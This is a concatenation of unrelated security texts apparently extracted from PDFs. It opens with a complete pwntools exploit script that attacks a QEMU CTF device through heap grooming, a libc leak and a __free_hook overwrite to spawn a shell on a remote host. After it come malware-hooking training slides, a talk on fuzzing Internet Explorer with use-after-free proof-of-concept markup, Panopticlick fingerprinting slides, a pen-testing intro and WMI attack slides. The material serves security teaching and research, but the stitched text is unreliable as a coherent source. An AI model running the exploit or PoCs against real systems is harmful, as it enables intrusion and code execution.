process = debug_env.process
attach = debug_env.attach
def main():
#p = process('./qemu-system-x86_64 -display none -machine accel=qtest -m 512M -
device ctf -nodefaults -monitor none -qtest stdio'.split(' '))
p = remote('114.115.214.225', 8888)
p.recvuntil('OPENED')
p.sendline('outl 0xcf8 0x80001010')
p.recvuntil('OK')
p.sendline('outl 0xcfc 0xfebc0000')
p.recvuntil('OK')
p.sendline('outl 0xcf8 0x80001004')
p.recvuntil('OK')
p.sendline('outl 0xcfc 0x107')
p.recvuntil('OK')
set_note_idx(p, 0)
fengshui_size = 0x68
for i in range(8):
set_note_idx(p, i + 1)
set_size(p, fengshui_size)
alloc(p)
# set_dma_addr(p, 0)
# set_note_idx(p, 1)
# free(p)
# set_note_idx(p, 2)
# free(p)
# set_note_idx(p, 3)
# free(p)
# set_note_idx(p, 7)
# set_dma_addr(p, BASE+0x40) # set idx 0
# free(p)
# # leak heap addr
# set_note_idx(p, 7)
# set_dma_addr(p, 0x100)
# write_to_vm(p)
# heap_data = read_addr(p, 0x100, fengshui_size)
# log.info('data: {} {:#x} {:#x}'.format(heap_data, u64(heap_data[:8]),
u64(heap_data[8:16])))
# tcache_head_addr = heap_data[8:16]
# offset = 0x55555657a470 - 0x55555657a010
set_note_idx(p, 9)
set_size(p, 0x500)
alloc(p)
set_dma_addr(p, BASE+0x40) # set idx 0
free(p)
set_note_idx(p, 9)
set_dma_addr(p, 0x100)
write_to_vm(p)
libc_base = u64(read_addr(p, 0x100, 0x8)) - 0x1ebbe0
system_addr = libc_base + 0x55410
free_hook_addr = libc_base + 0x1eeb28
log.success('libc: {:#x} system: {:#x}'.format(libc_base, system_addr))
# 放置 binsh
set_note_idx(p, 5)
set_dma_addr(p, 0x300)
write_addr(p, 0x300, b'/bin/sh')
read_to_buf(p)
set_dma_addr(p, 0)
set_note_idx(p, 1)
free(p)
set_note_idx(p, 2)
free(p)
set_note_idx(p, 3)
free(p)
set_note_idx(p, 4)
set_dma_addr(p, BASE+0x40) # set idx 0
free(p)
write_addr(p, 0x200, p64(free_hook_addr))
write_addr(p, 0x300, p64(system_addr))
set_note_idx(p, 4)
set_dma_addr(p, 0x200)
read_to_buf(p)
set_note_idx(p, 10)
set_size(p, fengshui_size)
alloc(p)
set_note_idx(p, 11)
set_size(p, fengshui_size)
alloc(p)
set_note_idx(p, 11)
set_dma_addr(p, 0x300)
read_to_buf(p)
set_note_idx(p, 5)
free(p)
# attach(p)
# input()
p.interactive()
if __name__ == '__main__':
main() | pdf |
Module 2
Typical goals of malware and their
implementations
https://github.com/hasherezade/malware_training_vol1
Hooking
Hooking: the idea
•Hooking means intercepting the original execution of the
function with a custom code
•Goal: to create a proxy through which the input/output of the
called function bypasses
•Possible watching and/or interference in the input/output of
the function
Hooking: the idea
• Calling the function with no hook:
Call Function(arg0,arg1)
Function:
(process arg0, arg1)
...
ret
Hooking: the idea
• Calling the hooked function: the high-level goals
Intercept:
Arg0, arg2
Call Function
ret
Call Function(arg0,arg1)
Function:
(process arg0, arg1)
...
ret
Hooking: who?
Hooking is used for intercepting and modifying API calls
• By malware: i.e. spying on data
• By Anti-malware: monitoring execution
• Compatibility patches (Operating System level) - i.e. shimming engine
• Extending functionality of the API
Hooking in malware
•Sample purposes of hooks used by malware:
• Hiding presence in the system (rootkit component)
• Sniffing executions of APIs (spyware)
• Doing defined actions on the event of some API being called (i.e.
propagation to a newly created processes, screenshot on click)
• Redirection to a local proxy (in Banking Trojans)
Hooking: how?
There are various, more or less documented methods of hooking. Examples:
• Kernel Mode (*will not be covered in this course)
• User Mode:
• SetWindowsEx etc. – monitoring system events
• Windows subclassing – intercepting GUI components
• Inline/IAT/EAT Hooking – general API hooking
Monitoring system events
• Windows allows for monitoring certain events, such as:
• WH_CALLWNDPROC – monitor messages sent to a window
• WH_KEYBOARD
• WH_KEYBOARD_LL
• etc.
• The hook can be set via SetWindowsHookEx
• This type of hooks are often used by keyloggers
Monitoring system events
• Example: Remcos RAT
https://www.virustotal.com/gui/file/47593a26ec7a9e791bb1c94f4c4d56deaae25f37b7f77b0a44dc93ef0bca91fd
Monitoring system events
• Example: Remcos RAT
Windows subclassing
• This type of hooking can be applied on GUI components
• Window subclassing was created to extend functionality of the GUI controls
• You can set a new procedure that intercepts the messages of the GUI controls
• Related APIs:
• SetWindowLong, SetWindowLongPtr (the old approach: ComCtl32.dll < 6)
• SetWindowSubclass/RemoveWindowSubclass, SetProp/GetProp (the new approach: ComCtl>=6)
• Subclassed window gets a new property in: UxSubclassInfo or
CC32SubclassInfo (depending on the API version)
https://docs.microsoft.com/en-us/windows/win32/controls/subclassing-overview
Windows subclassing
• Windows subclassing can also be used by malware
• Example: subclassing the Tray Window in order to execute the injected code
https://github.com/hasherezade/demos/blob/master/inject_shellcode/src/window_long_inject.cpp
General API Hooking
• Most common and powerful, as it helps to intercept any API
• Types of userland hooks:
• Inline hooks (the most common)
• IAT Hooks
• EAT Hooks
API Hooking: the idea
Hooking API of a foreign process requires:
1.
Implanting your code into the target process
2. Redirecting the original call, so that it will pass through the implant
Implanting a foreign code
MainProgram.exe
Ntdll.dll
Kernel32.dll
implant
Any code that was added to the
original process. It can be a PE (DLL,
EXE), or a shellcode
Implanting a foreign code
MainProgram.exe
Ntdll.dll
Kernel32.dll
implant
Call kernel32.CreateFileA
The implant intercepts the call
IAT Hooking
IAT Hooking
• In case of IAT hooks, the address in the Import Table is altered
• IAT hooks are often used by Windows compatibility patches, shims
• Not as often (but sometimes) used by malware
IAT Hooking: idea
• In case of IAT Hooking we can really implement it in this simple way: by replacing the
address via which the function is called in the IAT
Intercept:
Arg0, arg2
Call Function
ret
Call Function(arg0,arg1)
Function:
(process arg0, arg1)
...
ret
IAT Hooking
The address filled in IAT leads to User32.dll (as the table points)
original
IAT Hooking
The address filled in IAT leads to a different module
hooked
IAT Hooking – the pros
• IAT hooking is much easier to implement than inline hooking
• The original DLL is unaltered, so we can call the functions from it via
the intercepting function directly – no need for the trampoline
IAT Hooking – the cons
• IAT hooking can intercept only the functions that are called via import
table
• Cannot hook lower level functions that are called underneath
• Cannot set hooks globally for the process – each module importing
the function has to be hooked separately
IAT hooking detection
• IAT Hooking is detected i.e. by PE-sieve/HollowsHunter
Pe-sieve.exe /pid <my_pid> /iat
Hollows_hunter.exe /iat
Inline Hooking
Inline Hooking
• In case of Inline hooks, the beginning of the original function is altered
• Inline hooks may also be used in legitimate applications
• Extremely often used in malware
Inline Hooking: idea
• In case of Inline Hooking we need to overwrite the beginning of the function: so, calling the
original one gets more complicated...
Intercept:
Arg0, arg2
Call Trampoline
...
ret
Call Function(arg0,arg1)
Function:
JMP Intercept
Function+OFFSET:
(process arguments)
...
ret
Trampoline:
<beginning of the
original Function>
Jmp Function+OFFSET
6
1
2
3
4
5
Inline Hooking: example
• Example of an inline hook installed by a malware in function CertGetCertificateChain
original
Inline Hooking: example
• Example of an inline hook installed by a malware in function CertGetCertificateChain
infected
Original: CertGetCertificateChain
call crypt32.CertGetCertificateChain
Hooked: CertGetCertificateChain
call crypt32.CertGetCertificateChain
Hooked: CertGetCertificateChain
call crypt32.CertGetCertificateChain
Hooked: CertGetCertificateChain
call crypt32.CertGetCertificateChain
Hooked: CertGetCertificateChain
call crypt32.CertGetCertificateChain
Hooked: CertGetCertificateChain
call crypt32.CertGetCertificateChain
Hooked: CertGetCertificateChain
call crypt32.CertGetCertificateChain
Inline Hooking: Hotpatching
• Inline hooking is officially supported
• The hotpatching support can significantly simplify the operation of setting the inline hook
• If the application is hotpatchable, then just before the prolog we can find: additional instructions:
• MOV EDI, EDI, and 5 NOPs
Inline Hooking: Hotpatching
• MOV EDI,EDI -> 2 BYTEs : can be filled with a short jump
• 5 NOPS -> 5 BYTEs : can be filled with a CALL
Inline Hooking: Hotpatching
• Hotpatching support can be enabled in the compiler options:
Inline hooking: common steps
1.
GetProcAddress(<function_to_be_hooked>)
2.
VirtualAlloc: alloc executable memory for the trampoline
3.
Write the trampoline: copy the beginning of the function to be hooked, and
the relevant address (common opcode: 0xE9 : JMP)
4.
VirtualProtect – make the area to be hooked writable
5.
Write the hook (common opcode: 0xE9 : JMP)
6.
VirtualProtect – set the previous access
Inline Hooking – the pros
• The hook works no matter which way the function was called
• Hook once, execute by all the modules loaded in the process
Inline Hooking – the cons
• We need to overwrite the beginning of the function, which means:
• Parsing assembly is required (in order not to corrupt any instructions, and
make a safe return)
• Additional space must be used for the trampoline (where the original
beginning of the function will be copied, allowing to call the original version
of the function )
• Making a stable hooking engine requires solving the concurrency issues:
the function that we are just hooking may be called from another thread
Inline Hooking – libraries
• There are ready-made open source libraries for inline hooking.
Examples:
• MS Detours: https://github.com/microsoft/Detours
• MinHook: https://github.com/TsudaKageyu/minhook
• ...and others
• Those libraries are also used by malware!
Inline hooking detection
• Inline Hooking is detected i.e. by PE-sieve/HollowsHunter
Pe-sieve.exe /pid <my_pid> (detects inline hooks by default)
Hollows_hunter.exe /hooks (hook detection can be enabled by /hooks)
Exercise 1
• The sample hooked application:
• https://drive.google.com/file/d/1CJL4tLlnbaMj-
nC9Mw7BOqc9KhNZGTH1/view?usp=sharing
• Run the crackme that has both inline hooks, and IAT hooks installed
• Scan the application by PE-sieve
• Analyze the reports, and see what can we learn about the hooks
Exercise 2
• Sphinx Zbot
• 52ca91f7e8c0ffac9ceaefef894e19b09aed662e
• This malware installs variety of inline hooks in available applications
• Scan the system with Hollows Hunter to grab the hook reports
• Examine the hooks
• Compare them with the sourcecode of the classic Zeus – find all the hooks
that overlap in both | pdf |
0-Day 輕鬆談 (0-Day Easy Talk)
2013/07/19 @ HITCON
<[email protected]>
Happy Fuzzing Internet Explorer
0-Day 甘苦談 (0-Day WTF Talk)
2013/07/19 @ HITCON
<[email protected]>
Happy Fuzzing Internet Explorer
這是一場簡單的演講
This is an Easy Talk
分享一些我的 Fuzzing 心得
Share Some Fuzzing Review of Mine
以及很順便的丟個 0-Day 出來
And Disclosed a 0-Day in Passing
大家好
Hello, Everyone
我是 Orange
This is Orange Speaking
現任大學生
I am a College Student, Now
CHROOT.org 成員
Member of CHROOT.org
DevCo.re 打工中
Part-Time Work at DevCo.re
揭露過一些弱點
Disclosed Some Vulnerabilities
cve 2013-0305
cve 2012-4775(MS12-071)
About Me
• 蔡政達 aka Orange
• 2009 台灣駭客年會競賽
冠軍
• 2011, 2012 全國資安競賽
金盾獎冠軍
• 2011 東京 AVTOKYO 講師
• 2012 香港 VXRLConf 講師
• 台灣 PHPConf, WebConf,
PyConf 講師
• 專精於
– 駭客攻擊手法
– Web Security
– Windows Vulnerability
Exploitation
如果對我有興趣可以到
blog.orange.tw
If You are Interesting at Me. You Can Visit
blog.orange.tw
我專注於
Web Security & 網路滲透
I Focus on / Interested in
Web Security & Network Penetration
但今天來聊聊 0-Day 以及
Fuzzing (不是我專門的領域 QQ)
But Today Let's Talk About 0-Day and Fuzzing
(I am Not Expert in This, But Just Share)
Conference-Driven 0-Day
n. 名詞
釋義: 為了研討會生 0-Day
在找 0-Day 中的一些筆記
Some Notes in Finding 0-Day
這次我們討論 IE
This Time We Talk About IE
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-
days-an-price-list-for-hackers-secret-software-exploits/
Hacker's Good Friend
方法
• White Box
– Code Review (IE5.5 Source Code)
– 二話不說丟進 IDA
• Black Box
– Fuzzing
Fuzzing
• Garbage in Garbage out
• 理論上可以找到所有漏洞
– 前提是你有無限的時間…
「時間越多,
0-Day 越多」
-⾙貝拉克.歐巴⾺馬
Fuzzing Model
Generator
Debugger
Result
Logger
http://youtube.com/watch?v=m7Xg-YnMisE
Debugger
• Windows Debug API
– DebugActiveProcess
– WaitForDebugEvent
– ContinueDebugEvent
– 好麻煩…
• 快速、客制化的 Debugger
PyDBG
A Pure Python Windows Debugger
Interface
Debug a Process
>>> import pydbg
>>> dbg = pydbg()
>>> dbg.load( file ) # or dbg.attach( pid )
>>> dbg.run()
Set Breakpoint
>>> dbg.bp_set( address, callback )
>>> dbg.set_callback( exception_code, callback )
Memory Manipulation
>>> dbg.read( address, length )
>>> dbg.write( address, length )
Crash Dump Report
>>> bin = utils.crash_binning.crash_binning()
>>> bin.record_crash( dbg )
>>> bin.crash_synopsis()
Logger (Filter)
• 滿山滿谷的 崩潰
• 不是所有的 Crash 能成
為 Exploit
• 九成以上是 Null Pointer
只能當 DoS 用
– mov eax, [ebx+0x70]
– ; ebx = 0
• EIP
• Disassemble
– jmp reg
– call reg
– call [reg + CONST]
• Stack
• SHE Chain
EIP = ffffffff !!?
0x50000 = 327680 = (65535 / 2)*10
The Value 65535 We Can Control
File Generator
The Most Important Part of Fuzzing
File Generator
• 內容越機歪越好,當然還是要符合 Spec
– 熟讀 Spec 熟悉 File Structure
– 想像力是你的超能力
Fuzzing 方向
1) 找新型態弱點 (麻煩但可通用)
2) 找已知型態弱點 (快速但有針對性)
新型態弱點
• 試試比較新、或比較少人用的
– HTML5 Canvas
– SVG
– VML
• cve-2013-2551 / VML Integer Overflow / Pwn2own / VUPEN
– WebGL
• IE11 Begin to Support
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec 啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
啃 Spec
已知型態弱點
• 研究以往的弱點我們可以知道
• Internet Explorer is Not Good at
– Parsing DOM Tree
– Parsing <TABLE> with <TR> & <TD>
– Parsing <TABLE> with <COL>
• CTreeNode & CTableLayout
Pseudo Scenario of Use-After-Free
1. <foo>
2. <bla id=x>
3.
<bar id=y>
4.
……
5.
</bar>
6. </bla>
7. </foo>
1. <script>
2. var x =
document.getElementById( 'x' );
3. var y =
document.getElementById( 'y' );
4. x.innerHTML = 'AAAA…';
5. y.length = 100px;
6. </script>
Ex: CVE-2011-1260 (Not Full Version)
1.
<body>
2.
<script>
3.
document.body.innerHTML += "<object …>TAG_1</object>";
4.
document.body.innerHTML += "<aid='tag_3' style='…'>TAG_3</a>";
5.
document.body.innerHTML +="AAAAAAA";
6.
document.body.innerHTML += "<strong style='…'>TAG_11</strong>";
7.
</script>
8.
</body>
Ex: CVE-2012-1876 (Heap Overflow)
1. <script> setTimeout("trigger();",1); </script>
2. <TABLE style="table-layout: fixed; ">
3. <col id="132" width="41" span="1" > </col>
4. </col>
5. </TABLE>
1. function trigger() {
2. var obj_col =
document.getElementById("132");
3. obj_col.width = "42765";
4. obj_col.span = 1000;
5. }
Fuzzing with DOM Tree
https://www.facebook.com/zztao
• Using DOM Methods to
Manipulate Objects
– CreateElement
– removeChild appendChild
– InnerHTML outerText
– createRange
– addEventListener
– select
– …
Putting All Together
1) Randomize HTML Node for Initial
2) Manipulated Nodes with DOM Method
( Can Also Play with CSS at the Same Time)
「運氣不好,
是⼈人品問題」
-⾙貝拉克.歐巴⾺馬
Generally, Single Machine Run Can
Find 1 or 2 IE 0-Day in a Month
I Have Successfully Found 0-Days from IE6 to IE9,
For IE10+ I Haven't Tried Because I am Too Lazy : (
So I Found a 0-Day For HITCON
1) Work on Internet Explore 8
2) Mshtml.dll 8.0.6001.23501
http://www.zdnet.com/ie8-zero-day-flaw-targets-u-s-nuke-researchers-all-versions-
of-windows-affected-7000014908/
WinXP 還能再戰十年
Proof-of-Concept
<html>
<script>
var x = document.getElementById('eee');
x.innerHTML = '';
</script>
<body>
<table>
……
</table>
</body>
</html>
Microsoft is Our Sponsor
I Can't Say More Detail Until Patched : (
Call Stack
call edx
(e10.950): Access violation - code c0000005 (!!! second chance !!!)
eax=3dbf00a4 ebx=0019bb30 ecx=037f12c8 edx=085d8b53
esi=0172b130 edi=00000000
eip=085d8b53 esp=0172b100 ebp=0172b11c iopl=0 nv up ei pl
zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000246
085d8b53 ?? ???
Writing Exploit
• Windows Protection
– DEP
– Luckily If Windows XP We Don't Care About ASLR
– Luckily It is Not IE10+ that It Hasn't vTable Guard
So, Writing Exploit is Easy
Heap Spray + ROP Enough
Demo
http://youtube.com/watch?v=QwKkfUcq_VA
本來故事到這有個美滿的結局
Originally, This Story Have a Happy Ending
But
人生最精彩的就是這個 But
0-Day 在 HITCON 前一週被修掉了
Silent Fixed Before a Week of HITCON
What the
Proof-of-Concept
1. <!DOCTYPE html>
2. <table>
3. <tr><legend><span >
4. <q id='e'>
5. <a align="center"> <th> O </th> </a>
6. </q>
7. </span></legend></tr>
8. </table>
9. </html>
1. window.onload = function(){
2. var x =
document.getElementById('e');
3. x.outerText = '';
4. }
Work on
• mshtml.dll …… # ……
• mshtml.dll …... # 2013 / 05 / 14
• mshtml.dll 8.0.6001.23501 # 2013 / 06 / 11
• mshtml.dll 8.0.6001.23507 # 2013 / 07 / 09
Reference
• VUEPN Blog
– http://www.vupen.com/blog/
• Paimei
– https://github.com/OpenRCE/paimei
• Special Thank tt & nanika
Thanks
<[email protected]> | pdf |
How Unique is Your Browser?
a report on the Panopticlick experiment
Peter Eckersley
Senior Staff Technologist
Electronic Frontier Foundation
[email protected]
What is “identifying information”?
Name & address!
But also...
Latanya Sweeney:
ZIP + DOB + gender
identifies almost all US residents
7 billion people on earth
→ typically only ~20,000 per ZIP
→ divide by 365 for birthday
→ divide by ~70 for birth year
→ divide by 2 for gender
(on average works for ZIPs up to 50,000)
How?
Bits of Information
We can measure information in bits:
Each bit of information required doubles the number of
possibilities
Each bit of information obtained halves it
For instance
To identify a human, we need
log 2 7 billion = 33 bits
Learning someone's birthdate
log 2 365.25 = 8.51 bits
Surprisal and Entropy
Information from a particular value for a variable gives
us surprisal or self-information:
Birthdate = 1st of March: 8.51 bits
Birthdate = 29th of February: 10.51 bits
The weighted average for that variable is the entropy
of the variable
Surprisal of an event
I = - log2 Pr(event)
Entropy
H = Σ Pr(event) . I
events
Adding surprisals
If variables are independent, surprisals add linearly
(birthdate + gender are independent)
Starsign and birthdate are the opposite
Use joint distributions / conditional probability to
model this
Now for an application...
“Track” → associate the browser's activities:
- at different times
- with different websites
Browser Tracking
What ways exist to track browsers?
Cookies
IP addresses
Supercookies
And Fingerprints
Browser has some combination of characteristics
which, like DOB + ZIP + gender, are enough to
distinguish it from all others
Fingerprint Privacy threats
Globally unique?
Fingerprint + IP → unique?
Occasional cookie undelete?
Auto linked cookie?
Fingerprinting rumours
“Analytics companies are using this method”
“DRM systems are using this method”
“Financial systems are using this method”
How good is it?
(Also: how bad is the logging of User Agent strings?)
Let's do an experiment to find out!
https://panopticlick.eff.org
Fingerprint information we collected
User Agent strings
Other browser headers
Cookie blocking?
Timezone (js)
Screen size (js)
Browser plugins + versions (js)
Supercookie blocking? (js)
System fonts (flash/java)
(Things Panopticlick didn't collect)
Quartz crystal clock skew
TCP/IP characteristics
Screen DPI
HTTP header ordering
Most ActiveX / Silverlight stuff
JavaScript quirks
CSS history
CSS font list (flippingtypical.com !)
More supercookies
lots more!
Data quality control
Use 3-month cookies and encrypted IP addresses
Can correct double counting if people return / reload
(Except: interleaved cookies)
(NOTE: the live data only uses the cookies!)
Dataset
Slightly over a million different browser-instances
have visited Panopticlick.eff.org
Privacy conscious users:
→ not representative of the wider Web userbase
→ the relevant population for some privacy questions
(analysed the first 500,000 or so)
83.6% had completely unique fingerprints
(entropy: 18.1 bits, or more)
94.2% of “typical desktop browsers” were unique
(entropy: 18.8 bits, or more)
Which browsers did best?
Which variables mattered?
Variable
Entropy
User Agent
10.0 bits
Other headers
6.09 bits
Cookies enabled?
0.353 bits
Timezone
3.04 bits
Screen size
4.83 bits
Plugins
15.4 bits
Supercookies
2.12 bits
Fonts
13.9 bits
Or in more detail...
Are fingerprints constant?
Rate of change of fingerprints
Very high!
Looks like good protection
(but it isn't)
Fuzzy Fingerprint Matching
- Test for Flash/Java
- If yes, and only only one of the 8 components has
changed [much], we match
Guessed 66% of the time
99.1 % correct; 0.9% false-positive
so...
Which browsers did well?
Those without JavaScript
Those with Torbutton enabled
iPhones and Androids [*]
Cloned systems behind firewalls
Paradox: some “privacy enhancing”
technologies are fingerprintable
- Flash blockers
- Some forged User Agents
- “Privoxy” or “Browzar” in your User Agent!
Noteworthy exceptions:
- NoScript
- TorButton
Test vs. Enumerate
Plugins and fonts → long lists of facts about a
computer are very identifying!
Possible solution: testing rather than enumeration
(“Does this browser have the Frankenstein font
installed?”)
Other solution: browsers do not supply this stuff to
websites at all...
Fingerprintability vs Debuggability
Do we need all this for a browser?
Mozilla/5.0 (X11; U; Linux i686; en-AU; rv:1.9.1.9) Gecko/20100502 Seamonkey/2.0.4
All this for each plugin?
Shockwave Flash 10.1 r53
How much of a problem is this?
Many fingerprints are globally unique
Defensive measures
Power users:
- Block JavaScript with NoScript
- Use Torbutton (possibly without Tor)
Everyone else needs to wait for the browsers to fix it
Some of the browsers have started! | pdf |
So you think you want to be a
pen-tester.
Anch - @boneheadsanon – [email protected]
Introductions
• Penetration Tester – 10 years
• Red Team Lead – 5 years
• I’m here to help.
• Contact Info:
Twitter: @boneheadsanon
E-Mail: [email protected]
• The Leprecaun?
The Wonderful World of Penetration
Testing
Misconceptions and Realities
Everyone Has One
Red Team, Blue Team, Purple Team, Yellow Team??
Just don’t wear the brown pants. | pdf |
#BHUSA @BlackHatEvents
Blasting Event-Driven Cornucopia:
WMI-based User-Space Attacks
Blind SIEMs and EDRs
Claudiu Teodorescu
Andrey Golchikov
Igor Korkin
#BHUSA @BlackHatEvents
Information Classification: General
The Binarly Team
Claudiu “to the rescue” Teodorescu – @cteo13
Digital Forensics, Reverse Engineering, Malware & Program Analysis
Instructor of Special Topics of Malware Analysis Course on BlackHat USA
Speaker at DEF CON, BSidesLV, DerbyCon, ReCon, BlackHat, author of WMIParser
Andrey “red plait” Golchikov – @real_redp
More than 20 years in researching operating system security and reversing Windows Internals
Speaker at BlackHat, author of WMICheck
redplait.blogspot.com
Igor Korkin – @IgorKorkin
PhD, Windows Kernel Researcher
Speaker at CDFSL, BlackHat, HITB, SADFE, Texas Cyber Summit, author of MemoryRanger
igorkorkin.blogspot.com
#BHUSA @BlackHatEvents
Information Classification: General
Agenda
Windows Management Instrumentation (WMI)
Architecture and features
Abusing WMI by attackers: MITRE ATT&CK and malware samples
Applying WMI for defenders: academic and practical results
Attacks on WMI blind the whole class of EDR solutions
Overview of existing attacks on WMI
Attacks on user- and kernel- space components
WMICheck detects attacks on WMI
WMI sandboxing attack
MemoryRanger prevents the WMI sandboxing
#BHUSA @BlackHatEvents
Information Classification: General
Windows Management Instrumentation (WMI)
Architecture
#BHUSA @BlackHatEvents
Information Classification: General
WMI provider is a user-mode COM DLL or kernel driver
Enumerates WMI providers, the DLLs that back the provider, and the classes hosted by the provider by Matt Graeber
Windows 11 includes over 4000 built-in WMI providers:
• BIOS\UEFI
• OS and Win32
• WMI, ETW
• Disks and Files
• Registry
• Network and VPN
• Encryption
• Security Assessment
• Hyper-V
• Microsoft Defender:
• Antimalware
• DeviceGuard
• Hardware:
• Multimedia (sound, graphics)
• TPM
• Power and Temp Management
netnccim.mof
#BHUSA @BlackHatEvents
Information Classification: General
WMI Events
WMI is great for both attackers and defenders
Trigger on a multitude of events to perform a certain action
1.
Filter – a specific event to trigger on
2.
Consumer – an action to perform upon the firing of a filter
3.
Binding – link between Filter and Consumer
Intrinsic Events - instances of a class that is mainly derived from __InstanceCreationEvent,
__InstanceModificationEvent, or __InstanceDeletionEvent and are used to monitor a resource represented by
a class in the CIM repository; polling interval required for querying which may lead to missing events
Extrinsic Events - instances of a class that is derived from the __ExtrinsicEvent class that are generated by
a component outside the WMI implementation (monitoring registry, processes, threads, computer shutdowns
and restarts, etc. )
#BHUSA @BlackHatEvents
Information Classification: General
WMI Filters – When it will happen?
An instance of the __EventFilter WMI Class to specify which event are delivered to the bound
consumer
•
EventNamespace – describes the namespace the events originate (usually ROOT\Cimv2)
•
QueryLanguage - WQL
•
Query – describes the type of event to be filter via a WQL query
WMI Query Language(WQL)
SELECT [PropertyName | *] FROM [<INTRINSIC> ClassName] WITHIN [PollingInterval] <WHERE FilteringRule>
SELECT [PropertyName | *] FROM [<EXTRINSIC> ClassName] <WHERE FilteringRule>
WMI Query Language(WQL) Examples
SELECT * FROM __InstanceCreationEvent Within 10 WHERE TargetInstance ISA "Win32_Process" AND Targetinstance.Name =
"notepad.exe“
SELECT * FROM RegistryKeyChangeEvent WHERE Hive=“HKEY_LOCAL_MACHINE” AND
KeyPath=“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run”
#BHUSA @BlackHatEvents
Information Classification: General
WMI Consumers – What will happen?
Defines the action to be carried out once a bound filter was triggered
Standard Event consumers (inherit from __EventConsumer):
•
save to file (LogFileEventConsumer)
•
run a script (ActiveScriptEventConsumer)
•
log into EventLog (NTEventLogEventConsumer)
•
use network (SMTPEventConsumer)
•
run a script (CommandLineEventConsumer)
Persistence & Code Execution in WMI repository in three steps:
1.
Create filter, instance of __EventFilter, to describe the event to trigger on
2.
Create consumer, instance of __EventConsumer, to describe the action to perform
3.
Create binding, instance of __FilterToConsumerBinding, to link filter to consumer
#BHUSA @BlackHatEvents
Information Classification: General
WMI client binds filter and consumer to monitor events
EventViewerConsumer
Message about service update
Message about service update
Message about service update
The installed filter is
bound to the
consumer to monitor
services-related events
Add a filter, consumer
and bind them
Query WMI about
monitored events
Remove the filter,
consumer and their bind
Windows Services
A new service
is installed
An
event
...
✔
WMI Service
WMI client
#BHUSA @BlackHatEvents
Information Classification: General
CIM Repository
Database Location: %WBEM%\Repository
Format of the CIM Repository is undocumented:
• FireEye FLARE team reversed the file format
• Whitepaper authored by Ballenthin, Graeber, Teodorescu
• Forensic Tools: WMIParser, python-cim
#BHUSA @BlackHatEvents
Information Classification: General
WMI Forensics: logical to physical abstraction
#BHUSA @BlackHatEvents
Information Classification: General
Firmware related WMI Forensics
#BHUSA @BlackHatEvents
Information Classification: General
Firmware WMI Querying via PS (1/3)
#BHUSA @BlackHatEvents
Information Classification: General
Firmware WMI Querying via PS (2/3)
#BHUSA @BlackHatEvents
Information Classification: General
Firmware WMI Querying via PS (3/3)
#BHUSA @BlackHatEvents
Information Classification: General
WMI used by both defenders and attackers
#BHUSA @BlackHatEvents
Information Classification: General
WMI leveraged by attackers
Attackers can leverage the WMI ecosystem in a multitude of ways:
•
Reconnaissance: OS information, File System, Volume, Processes, Services, Accounts, Shares, Installed Patches
•
AV Detection: \\.\ROOT\SecurityCenter[2]\AntiVirusProduct
•
Fileless Persistence: Filter and Consumer binding
•
Code execution: Win32_Process::Create, ActiveScriptEventConsumer, CommandLineEventConsumer, etc
•
Lateral movement: Remotely create a WMI class to transfer data via network
•
Data storage: Store data in dynamically created classes
•
C&C communication: Remotely create or modify a class to store/retrieve data
#BHUSA @BlackHatEvents
Information Classification: General
WMI – Persistence
Event
#BHUSA @BlackHatEvents
Information Classification: General
Evil WMI Class stores
malware that is executed
by a consumer
WMI – Code Execution
#BHUSA @BlackHatEvents
Information Classification: General
WMI on Twitter
#BHUSA @BlackHatEvents
Information Classification: General
WMI Forensics Tools
#BHUSA @BlackHatEvents
Information Classification: General
Tools used in our WMI Research
WBEMTEST
• Built-in in Windows since 2000’
• User-friendly
Scripting (VBScript\JScript\PS)
• Add/query/remove
• __EventFilter
• EventViewerConsumer
• __FilterToConsumerBinding
Third-party WMI explorers:
• ver 2.0.0.2 by Vinay Pamnani (@vinaypamnani/wmie2)
• ver 1.17c by Alexander Kozlov (KS-Soft)
Our own developed WMI client (receive_wmi_events.exe)
• C++ based
• Register a IWbemObjectSink-based callback
• Print recently launched processes
#BHUSA @BlackHatEvents
Information Classification: General
ATTACKS ON WMI – THE BIG PICTURE
#BHUSA @BlackHatEvents
Information Classification: General
Threat Modeling WMI
#BHUSA @BlackHatEvents
Information Classification: General
Why attacks on WMI are so dangerous?
• These attacks have existed and been unfixed for more than 20 years.
• WMI service is not a critical app: it does not have PPL or trust label.
• Neither EDR solution nor PatchGuard/HyperGuard can detect these attacks.
• Windows Defender fails to detect attacks on WMI as well.
• WMI attacks can be implemented via user-mode code and by applying the
similar privilege level as WMI service.
• All these attacks are architectural flaws and cannot be fixed easily.
#BHUSA @BlackHatEvents
Information Classification: General
Attacks on WMI files and configs in registry
WMI Files on the disk
Control apps: EXE, DLLs
%SystemRoot%\System32\wbem\
%SystemRoot%\System32
User-mode Providers
%SystemRoot%\system32\WBEM\
*.MOF || *.DLL
Kernel-mode Providers
%SystemRoot%\system32\*.SYS
WBEM Repository files
%SystemRoot%\system32\
INDEX.BTR
MAPPING1.MAP
MAPPING2.MAP
MAPPING3.MAP
OBJECTS.DATA
WMI Settings in registry
WinMgmt service config
HKLM\System\CurrentControlSet\
Services\Winmgmt\
WMI and CIMOM Registry config
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Wbem\*
WMI Providers GUID SD
HKLM\SYSTEM\CurrentControlSet\
Control\WMI\Security\{GUIDs}
Other configs: OS, OLE & COM etc
HKLM\SYSTEM\Setup\
SystemSetupInProgress,
UpgradeInProgress
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Ole
HKLM\SOFTWARE\Microsoft\COM3
HKCR\CLSID\{GUIDs}
Modify content
Remove value
Restrict access
Attacker’s
App
